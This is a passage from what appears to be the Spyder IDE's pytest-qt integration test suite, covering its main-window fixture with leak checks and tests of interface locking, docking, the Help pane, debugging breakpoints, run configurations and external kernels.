        # Force a Spyder kernel spec instead of a plain IPython one.
        manager._kernel_spec = SpyderKernelSpec()
    manager.start_kernel(**kwargs)
    client = manager.client()
    client.start_channels()
    try:
        client.wait_for_ready(timeout=startup_timeout)
    except RuntimeError:
        # Kernel never became ready: tear down before propagating.
        client.stop_channels()
        manager.shutdown_kernel()
        raise
    return manager, client
def find_desired_tab_in_window(tab_name, window):
    """Return the (tab bar, tab index) showing *tab_name*, or (None, None)."""
    target = str(tab_name)
    for tabbar in window.findChildren(QTabBar):
        for index in range(tabbar.count()):
            if tabbar.tabText(index) == target:
                return tabbar, index
    return None, None
def register_fake_entrypoints():
    """
    Create entry points distribution to register elements:
    * Completion providers (Fallback, Snippets, LSP)
    """
    # Entry-point specs for the completion providers.
    provider_specs = {
        'fallback': (
            'fallback = spyder.plugins.completion.providers.fallback.provider:'
            'FallbackProvider'
        ),
        'snippets': (
            'snippets = spyder.plugins.completion.providers.snippets.provider:'
            'SnippetsProvider'
        ),
        'lsp': (
            'lsp = spyder.plugins.completion.providers.languageserver.provider:'
            'LanguageServerProvider'
        ),
    }
    providers = {
        name: pkg_resources.EntryPoint.parse(spec)
        for name, spec in provider_specs.items()
    }

    # Fake Spyder distribution exposing the providers as entry points.
    dist = pkg_resources.Distribution(__file__)
    dist._ep_map = {'spyder.completions': providers}

    # Make the fake distribution visible through the global working_set.
    pkg_resources.working_set.add(dist, 'spyder')
def remove_fake_entrypoints():
    """Remove fake entry points from pkg_resources.

    Each removal is independent, so a missing key or entry (e.g. when the
    fake distribution was never registered, or this is called twice) does
    not prevent the remaining ones from being cleaned up. The previous
    implementation caught only KeyError, which (a) aborted all later
    removals on the first missing key and (b) did not cover the
    ValueError raised by ``list.remove`` on the ``entries`` list.
    """
    working_set = pkg_resources.working_set
    # dict.pop with a default never raises, so each step always runs.
    working_set.by_key.pop('unknown', None)
    working_set.entry_keys.pop('spyder', None)
    working_set.entry_keys.pop(__file__, None)
    # list.remove raises ValueError (not KeyError) when absent; guard it.
    if 'spyder' in working_set.entries:
        working_set.entries.remove('spyder')
def read_asset_file(filename):
    """Read contents of an asset file."""
    asset_path = osp.join(LOCATION, filename)
    # encoding.read returns (text, encoding); only the text is needed.
    return encoding.read(asset_path)[0]
# =============================================================================
# ---- Fixtures
# =============================================================================
@pytest.fixture
def main_window(request, tmpdir, qtbot):
    """
    Main Window fixture.

    Builds (or reuses) a full Spyder main window, configured according to
    the markers on the requesting test (``use_introspection``,
    ``single_instance``, ``preload_project``, ``preload_complex_project``)
    and any ``spy_config`` tuple passed via indirect parametrization.
    After the test it closes what the test opened and — except on
    Windows — fails the test if extra threads, subprocesses or open files
    leaked during the run.
    """
    if not running_in_ci():
        register_fake_entrypoints()
    # Tests assume inline backend
    CONF.set('ipython_console', 'pylab/backend', 0)
    # Test assume the plots are rendered in the console as png
    CONF.set('plots', 'mute_inline_plotting', False)
    CONF.set('ipython_console', 'pylab/inline/figure_format', 0)
    # Set exclamation mark to True
    CONF.set('ipython_console', 'pdb_use_exclamation_mark', True)
    # Check if we need to use introspection in a given test
    # (it's faster and less memory consuming not to use it!)
    use_introspection = request.node.get_closest_marker('use_introspection')
    if use_introspection:
        os.environ['SPY_TEST_USE_INTROSPECTION'] = 'True'
    else:
        try:
            os.environ.pop('SPY_TEST_USE_INTROSPECTION')
        except KeyError:
            pass
    # Only use single_instance mode for tests that require it
    single_instance = request.node.get_closest_marker('single_instance')
    if single_instance:
        CONF.set('main', 'single_instance', True)
    else:
        CONF.set('main', 'single_instance', False)
    # Check if we need to load a simple project to the interface
    preload_project = request.node.get_closest_marker('preload_project')
    if preload_project:
        # Create project directory
        project = tmpdir.mkdir('test_project')
        project_path = str(project)
        # Create Spyder project
        spy_project = EmptyProject(project_path)
        CONF.set('project_explorer', 'current_project_path', project_path)
        # Add a file to the project
        file = project.join('file.py')
        file.write(read_asset_file('script_outline_1.py'))
        spy_project.set_recent_files([str(file)])
    else:
        CONF.set('project_explorer', 'current_project_path', None)
    # Check if we need to preload a complex project in a give test
    preload_complex_project = request.node.get_closest_marker(
        'preload_complex_project')
    if preload_complex_project:
        # Create project
        project = tmpdir.mkdir('test_project')
        project_subdir = project.mkdir('subdir')
        project_sub_subdir = project_subdir.mkdir('sub_subdir')
        # Create directories out of the project
        out_of_project_1 = tmpdir.mkdir('out_of_project_1')
        out_of_project_2 = tmpdir.mkdir('out_of_project_2')
        out_of_project_1_subdir = out_of_project_1.mkdir('subdir')
        out_of_project_2_subdir = out_of_project_2.mkdir('subdir')
        project_path = str(project)
        spy_project = EmptyProject(project_path)
        CONF.set('project_explorer', 'current_project_path', project_path)
        # Add some files to project. This is necessary to test that we get
        # symbols for all these files.
        abs_filenames = []
        filenames_to_create = {
            project: ['file1.py', 'file2.py', 'file3.txt', '__init__.py'],
            project_subdir: ['a.py', '__init__.py'],
            project_sub_subdir: ['b.py', '__init__.py'],
            out_of_project_1: ['c.py'],
            out_of_project_2: ['d.py', '__init__.py'],
            out_of_project_1_subdir: ['e.py', '__init__.py'],
            out_of_project_2_subdir: ['f.py']
        }
        for path in filenames_to_create.keys():
            filenames = filenames_to_create[path]
            for filename in filenames:
                file = path.join(filename)
                abs_filenames.append(str(file))
                if osp.splitext(filename)[1] == '.py':
                    # Different outline scripts per directory so symbol
                    # results can be told apart in tests.
                    if path == project_subdir:
                        code = read_asset_file('script_outline_2.py')
                    elif path == project_sub_subdir:
                        code = read_asset_file('script_outline_3.py')
                    else:
                        code = read_asset_file('script_outline_1.py')
                    file.write(code)
                else:
                    file.write("Hello world!")
        spy_project.set_recent_files(abs_filenames)
    else:
        if not preload_project:
            CONF.set('project_explorer', 'current_project_path', None)
    # Get config values passed in parametrize and apply them
    try:
        # request.param only exists for indirectly-parametrized tests.
        param = request.param
        if isinstance(param, dict) and 'spy_config' in param:
            CONF.set(*param['spy_config'])
    except AttributeError:
        pass
    # The window is cached as an attribute on this fixture function so it
    # can be reused across tests (closing/reopening Spyder is expensive).
    if not hasattr(main_window, 'window'):
        from spyder.api.plugin_registration.registry import PLUGIN_REGISTRY
        PLUGIN_REGISTRY.reset()
        # Start the window
        window = start.main()
        main_window.window = window
    else:
        window = main_window.window
    # Remove Kite (In case it was registered via setup.py)
    window.completions.providers.pop('kite', None)
    # Wait until console is up
    shell = window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    if os.name != 'nt':
        # Record a baseline of threads/files/subprocesses before the test
        # so leaks can be detected afterwards (not done on Windows).
        # _DummyThread are created if current_thread() is called from them.
        # They will always leak (From python doc) so we ignore them.
        init_threads = [
            repr(thread) for thread in threading.enumerate()
            if not isinstance(thread, threading._DummyThread)]
        proc = psutil.Process()
        init_files = [repr(f) for f in proc.open_files()]
        init_subprocesses = [repr(f) for f in proc.children()]
    yield window
    # ---- Teardown ----
    # Print shell content if failed
    # NOTE(review): rep_setup/rep_call are presumably attached by a pytest
    # hookwrapper defined elsewhere (not visible in this chunk) — confirm.
    if request.node.rep_setup.passed:
        if request.node.rep_call.failed:
            # Print content of shellwidget and close window
            print(window.ipyconsole.get_current_shellwidget(
                )._control.toPlainText())
            # Print info page content is not blank
            console = window.ipyconsole
            client = console.get_current_client()
            if client.info_page != client.blank_page:
                print('info_page')
                print(client.info_page)
            # A failed test gets a fresh window next time.
            window.close()
            del main_window.window
        else:
            # Close everything we can think of
            window.editor.close_file()
            window.projects.close_project()
            if window.console.error_dialog:
                window.console.close_error_dialog()
            window.switcher.close()
            for client in window.ipyconsole.get_clients():
                window.ipyconsole.close_client(client=client, ask_recursive=False)
            window.outlineexplorer.stop_symbol_services('python')
            # Reset cwd
            window.explorer.chdir(get_home_dir())
            # Unregister boilerplate plugin
            spyder_boilerplate = window.get_plugin(
                'spyder_boilerplate', error=False)
            if spyder_boilerplate is not None:
                window.unregister_plugin(spyder_boilerplate)
    if os.name == 'nt':
        # Do not test leaks on windows
        return
    known_leak = request.node.get_closest_marker(
        'known_leak')
    if known_leak:
        # This test has a known leak
        return

    def show_diff(init_list, now_list, name):
        # Print the difference between the pre-test baseline and the
        # current state; mutates now_list by removing matched items.
        sys.stderr.write(f"Extra {name} before test:\n")
        for item in init_list:
            if item in now_list:
                now_list.remove(item)
            else:
                sys.stderr.write(item + "\n")
        sys.stderr.write(f"Extra {name} after test:\n")
        for item in now_list:
            sys.stderr.write(item + "\n")

    # The test is not allowed to open new files or threads.
    try:
        def threads_condition():
            threads = [
                thread for thread in threading.enumerate()
                if not isinstance(thread, threading._DummyThread)]
            return (len(init_threads) >= len(threads))
        qtbot.waitUntil(threads_condition, timeout=SHELL_TIMEOUT)
    except Exception:
        # Report leaked threads together with their current stacks.
        now_threads = [
            thread for thread in threading.enumerate()
            if not isinstance(thread, threading._DummyThread)]
        threads = [repr(t) for t in now_threads]
        show_diff(init_threads, threads, "thread")
        sys.stderr.write("Running Threads stacks:\n")
        now_thread_ids = [t.ident for t in now_threads]
        for threadId, frame in sys._current_frames().items():
            if threadId in now_thread_ids:
                sys.stderr.write("\nThread " + str(threads) + ":\n")
                traceback.print_stack(frame)
        raise
    try:
        qtbot.waitUntil(lambda: (
            len(init_subprocesses) >= len(proc.children())),
            timeout=SHELL_TIMEOUT)
    except Exception:
        subprocesses = [repr(f) for f in proc.children()]
        show_diff(init_subprocesses, subprocesses, "processes")
        raise
    try:
        qtbot.waitUntil(
            lambda: (len(init_files) >= len(proc.open_files())),
            timeout=SHELL_TIMEOUT)
    except Exception:
        files = [repr(f) for f in proc.open_files()]
        show_diff(init_files, files, "files")
        raise
@pytest.fixture(scope="session", autouse=True)
def cleanup(request):
    """Cleanup a testing directory once we are finished."""
    def close_window():
        # The window is cached on the main_window fixture function itself.
        if hasattr(main_window, 'window'):
            try:
                main_window.window.close()
            except AttributeError:
                pass
        # Also clean entry points if running locally.
        if not running_in_ci():
            remove_fake_entrypoints()

    request.addfinalizer(close_window)
# =============================================================================
# ---- Tests
# =============================================================================
@pytest.mark.slow
@pytest.mark.order(1)
@pytest.mark.single_instance
@pytest.mark.skipif(
    not running_in_ci(), reason="It's not meant to be run outside of CIs")
def test_single_instance_and_edit_magic(main_window, qtbot, tmpdir):
    """Test single instance mode and %edit magic."""
    editorstack = main_window.editor.get_current_editorstack()
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(
        lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    spy_dir = osp.dirname(get_module_path('spyder'))
    # Code run inside the kernel that tries to grab Spyder's lock file.
    # Since the running instance already holds it, lock() is expected to
    # return False when single-instance mode works.
    lock_code = (
        "import sys\n"
        "sys.path.append(r'{spy_dir_str}')\n"
        "from spyder.utils.external import lockfile\n"
        "lock_file = r'{lock_file}'\n"
        "lock = lockfile.FilesystemLock(lock_file)\n"
        "lock_created = lock.lock()\n"
        "print(lock_created)".format(
            spy_dir_str=spy_dir,
            lock_file=get_conf_path('spyder.lock'))
    )
    with qtbot.waitSignal(shell.executed, timeout=2000):
        shell.execute(lock_code)
    qtbot.wait(1000)
    assert not shell.get_value('lock_created')
    # Test %edit magic
    n_editors = editorstack.get_stack_count()
    p = tmpdir.mkdir("foo").join("bar.py")
    p.write(lock_code)
    with qtbot.waitSignal(shell.executed):
        shell.execute('%edit {}'.format(to_text_string(p)))
    qtbot.wait(3000)
    # %edit must open the file in a new editor tab with its contents.
    assert editorstack.get_stack_count() == n_editors + 1
    assert editorstack.get_current_editor().toPlainText() == lock_code
    main_window.editor.close_file()
@pytest.mark.slow
def test_lock_action(main_window):
    """Test the lock interface action."""
    action = main_window.layouts.lock_interface_action
    plugins = main_window.widgetlist

    # The interface starts out locked: every dock shows a plain QWidget
    # (an empty title bar) instead of the custom one.
    assert main_window.layouts._interface_locked
    for plugin in plugins:
        bar = plugin.dockwidget.titleBarWidget()
        assert not isinstance(bar, DockTitleBar)
        assert isinstance(bar, QWidget)

    # Unlocking swaps in the custom title bar on every dock.
    action.trigger()
    for plugin in plugins:
        assert isinstance(plugin.dockwidget.titleBarWidget(), DockTitleBar)
    assert not main_window.layouts._interface_locked

    # Toggle back to the default (locked) state.
    action.trigger()
    assert main_window.layouts._interface_locked
@pytest.mark.slow
@pytest.mark.order(1)
@pytest.mark.skipif(sys.platform.startswith('linux') and not running_in_ci(),
                    reason='Fails on Linux when run locally')
def test_default_plugin_actions(main_window, qtbot):
    """Test the effect of dock, undock, close and toggle view actions."""
    # Use a particular plugin
    file_explorer = main_window.explorer
    main_widget = file_explorer.get_widget()
    # Undock action: the plugin moves to its own top-level window.
    main_widget.undock_action.triggered.emit(True)
    qtbot.wait(500)
    main_widget.windowwidget.move(200, 200)
    assert not file_explorer.dockwidget.isVisible()
    assert main_widget.undock_action is not None
    assert isinstance(main_widget.windowwidget, SpyderWindowWidget)
    assert main_widget.windowwidget.centralWidget() == main_widget
    # Dock action: back into the main window; undocked window is gone.
    main_widget.dock_action.triggered.emit(True)
    qtbot.wait(500)
    assert file_explorer.dockwidget.isVisible()
    assert main_widget.windowwidget is None
    # Test geometry was saved on close
    geometry = file_explorer.get_conf('window_geometry')
    assert geometry != ''
    # Test restoring undocked plugin with the right geometry
    file_explorer.set_conf('undocked_on_window_close', True)
    main_window.restore_undocked_plugins()
    assert main_widget.windowwidget is not None
    assert (
        geometry == qbytearray_to_str(main_widget.windowwidget.saveGeometry())
    )
    main_widget.windowwidget.close()
    # Close action: hides the dock and unchecks the toggle-view action.
    main_widget.close_action.triggered.emit(True)
    qtbot.wait(500)
    assert not file_explorer.dockwidget.isVisible()
    assert not file_explorer.toggle_view_action.isChecked()
    # Toggle view action: shows the dock again.
    file_explorer.toggle_view_action.setChecked(True)
    assert file_explorer.dockwidget.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize('main_window', [{'spy_config': ('main', 'opengl', 'software')}], indirect=True)
def test_opengl_implementation(main_window, qtbot):
    """
    Test that we are setting the selected OpenGL implementation
    """
    # The fixture was parametrized to request the 'software' backend.
    assert main_window._test_setting_opengl('software')
    # Restore default config value
    CONF.set('main', 'opengl', 'automatic')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    np.__version__ < '1.14.0' or (os.name == 'nt' and PY2),
    reason="This only happens in Numpy 1.14+"
)
@pytest.mark.parametrize('main_window', [{'spy_config': ('variable_explorer', 'minmax', True)}], indirect=True)
def test_filter_numpy_warning(main_window, qtbot):
    """
    Test that we filter a warning shown when an array contains nan
    values and the Variable Explorer option 'Show arrays min/man'
    is on.

    For spyder-ide/spyder#7063.
    """
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Create an array that contains nan values.
    with qtbot.waitSignal(shell.executed):
        shell.execute('import numpy as np; A=np.full(16, np.nan)')
    qtbot.wait(1000)

    # No warning (in either capitalization) should reach the console.
    console_text = control.toPlainText()
    assert "warning" not in console_text
    assert "Warning" not in console_text

    # Restore default config value
    CONF.set('variable_explorer', 'minmax', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2 or not sys.platform == 'darwin',
                    reason="Times out in PY2 and fails on other than macOS")
@pytest.mark.known_leak  # Opens Spyder/QtWebEngine/Default/Cookies
def test_get_help_combo(main_window, qtbot):
    """
    Test that Help can display docstrings for names typed in its combobox.
    """
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    help_plugin = main_window.help
    webview = help_plugin.get_widget().rich_text.webview._webview
    if WEBENGINE:
        webpage = webview.page()
    else:
        webpage = webview.page().mainFrame()

    # --- From the console ---
    # Import numpy so its names can be inspected from the combobox.
    with qtbot.waitSignal(shell.executed):
        shell.execute('import numpy as np')

    object_combo = help_plugin.get_widget().object_combo
    object_combo.setFocus()

    # Type the module name, then a dotted attribute, for both the 'numpy'
    # and 'np' spellings, checking the rendered Help page each time.
    for round_number, module_name in enumerate(['numpy', 'np']):
        if round_number:
            # Clear the combo before the second round.
            object_combo.set_current_text('')
        qtbot.keyClicks(object_combo, module_name, delay=100)
        qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
        qtbot.keyClicks(object_combo, '.arange', delay=100)
        qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
@pytest.mark.known_leak  # Opens Spyder/QtWebEngine/Default/Cookies
def test_get_help_ipython_console_dot_notation(main_window, qtbot, tmpdir):
    """
    Test that Help works when called from the IPython console
    with dot calls i.e np.sin

    See spyder-ide/spyder#11821
    """
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    # Open test file
    test_file = osp.join(LOCATION, 'script_unicode.py')
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()
    # Run test file (F5) so its imports become available in the console.
    qtbot.keyClick(code_editor, Qt.Key_F5)
    qtbot.wait(500)
    help_plugin = main_window.help
    webview = help_plugin.get_widget().rich_text.webview._webview
    webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
    # Write a dotted function name in the console.
    qtbot.keyClicks(control, u'np.linalg.norm')
    # Get help
    control.inspect_current_object()
    # Check that an expected text is part of the page
    qtbot.waitUntil(
        lambda: check_text(webpage, "Matrix or vector norm."),
        timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="Too flaky on Mac")
def test_get_help_ipython_console_special_characters(
        main_window, qtbot, tmpdir):
    """
    Test that Help works when called from the IPython console
    for unusual characters.

    See spyder-ide/spyder#7699
    """
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    # Open test file
    test_file = osp.join(LOCATION, 'script_unicode.py')
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()
    # Run test file (F5) so the unicode-named function is defined.
    qtbot.keyClick(code_editor, Qt.Key_F5)
    qtbot.wait(500)
    help_plugin = main_window.help
    webview = help_plugin.get_widget().rich_text.webview._webview
    webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
    # Helper: check that `value` appears in the console's plain text.
    def check_control(control, value):
        return value in control.toPlainText()
    # Tab-complete 'aa' into the unicode identifier defined by the script.
    qtbot.keyClicks(control, u'aa\t')
    qtbot.waitUntil(lambda: check_control(control, u'aaʹbb'), timeout=2000)
    # Get help
    control.inspect_current_object()
    # Check that an expected text is part of the page
    qtbot.waitUntil(lambda: check_text(webpage, "This function docstring."),
                    timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' and running_in_ci(),
                    reason="Times out on Windows")
def test_get_help_ipython_console(main_window, qtbot):
    """Test that Help works when called from the IPython console."""
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    help_plugin = main_window.help
    webview = help_plugin.get_widget().rich_text.webview._webview
    if WEBENGINE:
        webpage = webview.page()
    else:
        webpage = webview.page().mainFrame()

    # Type an object's name in the console and ask Help to inspect it.
    qtbot.keyClicks(control, 'runfile')
    control.inspect_current_object()

    # The docstring of runfile mentions "namespace"; wait for it to show
    # up in the rendered Help page.
    qtbot.waitUntil(lambda: check_text(webpage, "namespace"), timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="Does not work on Mac and Windows!")
@pytest.mark.use_introspection
@pytest.mark.parametrize(
    "object_info",
    [("range", "range"),
     ("import numpy as np", "An array object of arbitrary homogeneous items")])
def test_get_help_editor(main_window, qtbot, object_info):
    """Test that Help works when called from the Editor."""
    help_plugin = main_window.help
    webview = help_plugin.get_widget().rich_text.webview._webview
    webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
    main_window.editor.new(fname="test.py", text="")
    code_editor = main_window.editor.get_focus_widget()
    editorstack = main_window.editor.get_current_editorstack()
    # Wait for the LSP to acknowledge the newly opened document.
    with qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000):
        code_editor.document_did_open()
    # Write some object in the editor
    object_name, expected_text = object_info
    code_editor.set_text(object_name)
    code_editor.move_cursor(len(object_name))
    # Wait for the LSP to process the text change before inspecting.
    with qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000):
        code_editor.document_did_change()
    # Get help
    with qtbot.waitSignal(code_editor.sig_display_object_info, timeout=30000):
        editorstack.inspect_current_object()
    # Check that an expected text is part of the page
    qtbot.waitUntil(lambda: check_text(webpage, expected_text), timeout=30000)
@pytest.mark.slow
def test_window_title(main_window, tmpdir):
    """Test window title with non-ascii characters."""
    projects = main_window.projects

    # Create a project in non-ascii path
    path = to_text_string(tmpdir.mkdir(u'測試'))
    projects.open_project(path=path)

    # Set non-ascii window title
    main_window.window_title = u'اختبار'

    # Recomputing the title must not raise and must contain the app name,
    # interpreter name, custom title and project directory name.
    main_window.set_window_title()
    title = main_window.base_title
    for fragment in (u'Spyder', u'Python', u'اختبار', u'測試'):
        assert fragment in title

    projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="Fails sometimes on Windows and Mac")
@pytest.mark.parametrize("debugcell", [True, False])
def test_move_to_first_breakpoint(main_window, qtbot, debugcell):
    """Test that we move to the first breakpoint if there's one present."""
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    # Main variables
    control = shell._control
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()
    # Load test file
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()
    # Set breakpoint ("toogle" is the debugger API's own spelling)
    code_editor.debugger.toogle_breakpoint(line_number=10)
    qtbot.wait(500)
    # Move the cursor to the start of the file before debugging.
    cursor = code_editor.textCursor()
    cursor.setPosition(0)
    code_editor.setTextCursor(cursor)
    if debugcell:
        # Advance 2 cells (Shift+Return runs a cell and advances)
        for i in range(2):
            qtbot.keyClick(code_editor, Qt.Key_Return,
                           modifier=Qt.ShiftModifier)
            qtbot.wait(500)
        # Debug the cell (Alt+Shift+Return)
        with qtbot.waitSignal(shell.executed):
            qtbot.keyClick(code_editor, Qt.Key_Return,
                           modifier=Qt.AltModifier | Qt.ShiftModifier)
        # Make sure everything is ready
        assert shell.spyder_kernel_comm.is_open()
        assert shell.is_waiting_pdb_input()
        # '!b' lists breakpoints; line 10 must be registered with pdb.
        with qtbot.waitSignal(shell.executed):
            shell.pdb_execute('!b')
        assert 'script.py:10' in shell._control.toPlainText()
        # We need to press continue as we don't test yet if a breakpoint
        # is in the cell
        with qtbot.waitSignal(shell.executed):
            shell.pdb_execute('!c')
    else:
        # Click the debug button
        with qtbot.waitSignal(shell.executed):
            qtbot.mouseClick(debug_button, Qt.LeftButton)
    # Verify that we are at first breakpoint
    shell.clear_console()
    qtbot.wait(500)
    with qtbot.waitSignal(shell.executed):
        shell.pdb_execute("!list")
    assert "1--> 10 arr = np.array(li)" in control.toPlainText()
    # Exit debugging
    with qtbot.waitSignal(shell.executed):
        shell.pdb_execute("!exit")
    # Set breakpoint on first line with code
    code_editor.debugger.toogle_breakpoint(line_number=2)
    # Click the debug button
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)
    # Wait until continue and stop on the breakpoint
    qtbot.waitUntil(lambda: "IPdb [2]:" in control.toPlainText())
    # Verify that we are still on debugging
    assert shell.is_waiting_pdb_input()
    # Remove breakpoint and close test file
    main_window.editor.clear_all_breakpoints()
    main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason='Fails on windows!')
def test_runconfig_workdir(main_window, qtbot, tmpdir):
    """Test runconfig workdir options."""
    from spyder.plugins.run.widgets import RunConfiguration
    CONF.set('run', 'configurations', [])
    # ---- Load test file ----
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()
    # --- Use cwd for this file ---
    rc = RunConfiguration().get()
    rc['file_dir'] = False
    rc['cw_dir'] = True
    config_entry = (test_file, rc)
    CONF.set('run', 'configurations', [config_entry])
    # --- Run test file ---
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    qtbot.keyClick(code_editor, Qt.Key_F5)
    qtbot.wait(500)
    # --- Assert we're in cwd after execution ---
    with qtbot.waitSignal(shell.executed):
        shell.execute('import os; current_dir = os.getcwd()')
    assert shell.get_value('current_dir') == get_home_dir()
    # --- Use fixed execution dir for test file ---
    temp_dir = str(tmpdir.mkdir("test_dir"))
    rc['file_dir'] = False
    rc['cw_dir'] = False
    rc['fixed_dir'] = True
    rc['dir'] = temp_dir
    config_entry = (test_file, rc)
    CONF.set('run', 'configurations', [config_entry])
    # --- Run test file again with the new configuration ---
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    qtbot.keyClick(code_editor, Qt.Key_F5)
    qtbot.wait(500)
    # --- Assert we're in fixed dir after execution ---
    with qtbot.waitSignal(shell.executed):
        shell.execute('import os; current_dir = os.getcwd()')
    assert shell.get_value('current_dir') == temp_dir
    # ---- Closing test file and resetting config ----
    main_window.editor.close_file()
    CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
                    reason="It's failing there")
def test_dedicated_consoles(main_window, qtbot):
    """Test running code in dedicated consoles."""
    from spyder.plugins.run.widgets import RunConfiguration
    # ---- Load test file ----
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()
    # --- Set run options for this file ---
    rc = RunConfiguration().get()
    # A dedicated console is used when these two options are False
    # ('systerm' is the key's actual spelling in the run config — keep it)
    rc['current'] = rc['systerm'] = False
    config_entry = (test_file, rc)
    CONF.set('run', 'configurations', [config_entry])
    # --- Run test file and assert that we get a dedicated console ---
    qtbot.keyClick(code_editor, Qt.Key_F5)
    qtbot.wait(500)
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    nsb = main_window.variableexplorer.current_widget()
    assert len(main_window.ipyconsole.get_clients()) == 2
    assert main_window.ipyconsole.get_widget().filenames == ['', test_file]
    assert main_window.ipyconsole.get_widget().tabwidget.tabText(1) == 'script.py/A'
    qtbot.wait(500)
    assert nsb.editor.source_model.rowCount() == 4
    # --- Assert only runfile text is present and there's no banner text ---
    # See spyder-ide/spyder#5301.
    text = control.toPlainText()
    assert ('runfile' in text) and not ('Python' in text or 'IPython' in text)
    # --- Clean namespace after re-execution ---
    with qtbot.waitSignal(shell.executed):
        shell.execute('zz = -1')
    qtbot.keyClick(code_editor, Qt.Key_F5)
    qtbot.wait(500)
    # Re-running must reset the namespace, wiping `zz`.
    assert not shell.is_defined('zz')
    # --- Assert runfile text is present after reruns ---
    assert 'runfile' in control.toPlainText()
    # ---- Closing test file and resetting config ----
    main_window.editor.close_file()
    CONF.set('run', 'configurations', [])
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
                    reason="Fails frequently on Linux")
def test_connection_to_external_kernel(main_window, qtbot):
    """Test that only Spyder kernels are connected to the Variable Explorer."""
    # Test with a generic kernel
    km, kc = start_new_kernel()
    main_window.ipyconsole.get_widget()._create_client_for_kernel(
        kc.connection_file, None, None, None)
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    with qtbot.waitSignal(shell.executed):
        shell.execute('a = 10')
    # Assert that there are no variables in the variable explorer
    # (a plain IPython kernel has no Spyder comm channel)
    main_window.variableexplorer.change_visibility(True)
    nsb = main_window.variableexplorer.current_widget()
    qtbot.wait(500)
    assert nsb.editor.source_model.rowCount() == 0
    python_shell = shell
    # Test with a kernel from Spyder
    spykm, spykc = start_new_kernel(spykernel=True)
    main_window.ipyconsole.get_widget()._create_client_for_kernel(
        spykc.connection_file, None, None, None)
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
    with qtbot.waitSignal(shell.executed):
        shell.execute('a = 10')
    # Assert that a variable is visible in the variable explorer
    main_window.variableexplorer.change_visibility(True)
    nsb = main_window.variableexplorer.current_widget()
    qtbot.wait(500)
    assert nsb.editor.source_model.rowCount() == 1
    # Test runfile in external_kernel
    run_action = main_window.run_toolbar_actions[0]
    run_button = main_window.run_toolbar.widgetForAction(run_action)
    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(
        "print(2 + 1)"
    )
    # Start running
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(run_button, Qt.LeftButton)
    assert "runfile" in shell._control.toPlainText()
    assert "3" in shell._control.toPlainText()
    # Try quitting the kernels
